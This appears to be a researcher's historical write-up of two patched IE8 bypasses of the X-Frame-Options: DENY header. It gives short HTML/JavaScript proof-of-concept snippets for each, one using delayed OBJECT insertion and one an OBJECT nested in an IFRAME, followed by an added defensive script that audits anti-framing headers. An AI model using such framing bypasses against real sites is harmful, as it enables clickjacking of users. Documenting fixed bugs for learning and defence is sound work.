Two approaches bypassed the X-Frame-Options: DENY header in IE8. The first uses a XAML Frame element as the embedding container; the second delays the insertion of an HTML OBJECT element via setTimeout, which caused IE to skip the header check on insertion.
<!-- Bypass via delayed OBJECT insertion -->
<script language="JavaScript">
var oHtml = document.createElement('<OBJECT TYPE="text/html" DATA="xframe.aspx" WIDTH="200" HEIGHT="100"></OBJECT>');
setTimeout("document.body.appendChild(oHtml);",1000);
</script>
Variation: OBJECT Inside IFRAME
This variation was found by David Ross, who took the same technique in a slightly different direction.
<!-- object.html, loaded inside a regular iframe -->
<object id="newObj" data="xframe.aspx" type="text/html" width="400" height="120"></object>
<!-- index.html -->
<iframe src="object.html" width="440" height="200"></iframe>
In this variation there are no tricks at all — just a plain <object> tag nested inside an <iframe>. No createElement, no setTimeout. Both bypasses let an attacker embed a page that had declared, via X-Frame-Options: DENY, that it must not be framed. Tested on IE8/Win7 and IE8/XP.
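The practical lesson from these bugs is that a single anti-framing header is a thin defence: IE8 predates CSP, so X-Frame-Options was the only control a page had, and both bypasses above defeated it. The following is an added example (not code from the original post) that audits a response's anti-framing headers from the defender's side, rating X-Frame-Options alone as "legacy-only" and treating a CSP frame-ancestors directive as the stronger control. It assumes headers are supplied as a plain object keyed by lowercase header name; that input shape, the function names and the sample responses are constructed for this example.

```javascript
// Added example, not code from the original post: audit a response's
// anti-framing headers. Headers are assumed to arrive as a plain object
// keyed by lowercase header name (hypothetical input shape).

// Extract the source list of a CSP frame-ancestors directive, or null if absent.
function parseFrameAncestors(csp) {
  if (!csp) return null;
  for (const directive of csp.split(';')) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length && tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1);
    }
  }
  return null;
}

// Classify framing protection as 'strong' (CSP frame-ancestors restricts
// embedding), 'legacy-only' (X-Frame-Options alone, the control IE8 bypassed)
// or 'none'. Returns { level, findings }.
function auditFramingProtection(headers) {
  const findings = [];
  const xfo = (headers['x-frame-options'] || '').trim().toUpperCase();
  const ancestors = parseFrameAncestors(headers['content-security-policy']);

  if (ancestors !== null) {
    // A wildcard source allows any embedder and gives no protection;
    // an empty source list is equivalent to 'none' and is treated as strong.
    if (ancestors.includes('*')) {
      findings.push('frame-ancestors * permits framing by any origin');
      return { level: 'none', findings };
    }
    if (xfo === '') {
      findings.push('consider adding X-Frame-Options for browsers without CSP support');
    }
    return { level: 'strong', findings };
  }

  if (xfo === 'DENY' || xfo === 'SAMEORIGIN') {
    findings.push('X-Frame-Options alone: add CSP frame-ancestors as defence in depth');
    return { level: 'legacy-only', findings };
  }
  if (xfo.startsWith('ALLOW-FROM')) {
    findings.push('ALLOW-FROM is obsolete and ignored by modern browsers; use frame-ancestors');
    return { level: 'legacy-only', findings };
  }
  if (xfo !== '') {
    // Browsers ignore unrecognised or conflicting values such as "DENY, SAMEORIGIN".
    findings.push(`unrecognised X-Frame-Options value "${xfo}" is ignored by browsers`);
  } else {
    findings.push('no anti-framing header present');
  }
  return { level: 'none', findings };
}

// Constructed sample responses for a stand-alone run.
const SAMPLE_RESPONSES = {
  legacyOnly: { 'x-frame-options': 'DENY' },
  hardened: {
    'x-frame-options': 'DENY',
    'content-security-policy': "default-src 'self'; frame-ancestors 'none'",
  },
  wildcard: { 'content-security-policy': 'frame-ancestors *' },
  unprotected: {},
};

for (const [name, headers] of Object.entries(SAMPLE_RESPONSES)) {
  console.log(name, auditFramingProtection(headers));
}
```

Run with `node` to print a verdict for each sample response. The audit deliberately rates a bare X-Frame-Options: DENY below a CSP frame-ancestors policy: the header is still worth sending for old clients, but the policy is what current browsers enforce.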
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.